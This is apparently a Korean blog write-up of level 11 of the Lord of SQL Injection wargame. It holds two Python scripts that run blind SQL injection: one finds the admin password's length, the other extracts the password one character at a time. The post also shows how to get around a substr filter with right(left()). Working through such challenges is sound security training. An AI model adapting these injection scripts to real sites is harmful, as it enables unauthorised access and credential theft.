Oh! JUN

[Lord Of SQL Injection] 11번 본문

문제풀이/Lord of SQL Injection

[Lord Of SQL Injection] 11번

Kwon Oh! JUN 2022. 2. 2. 00:44

패스워드 길이 알아내기

import requests
import string

url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")

for i in range(1,100):
    param = "?pw='|| length(pw)like'"+str(i)+"'%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)

    if response.text.find("Hello admin")>0:
        print("password :"+str(i))
        break

패스워드 알아내기

import requests
import string

url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")

asc = string.digits+string.ascii_letters
result=""

for i in range(1,9):
    for j in asc:
        param = "?pw=%27||ascii(right(left(pw,"+str(i)+"),1))like%27"+str(ord(j))+"%27%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print("suscess")
            print(j)
            result+=j
            break
print("pw :"+result)

 

substr 필터링 되니까 right(left(pw,1),1)로 우회해서 알아냈다.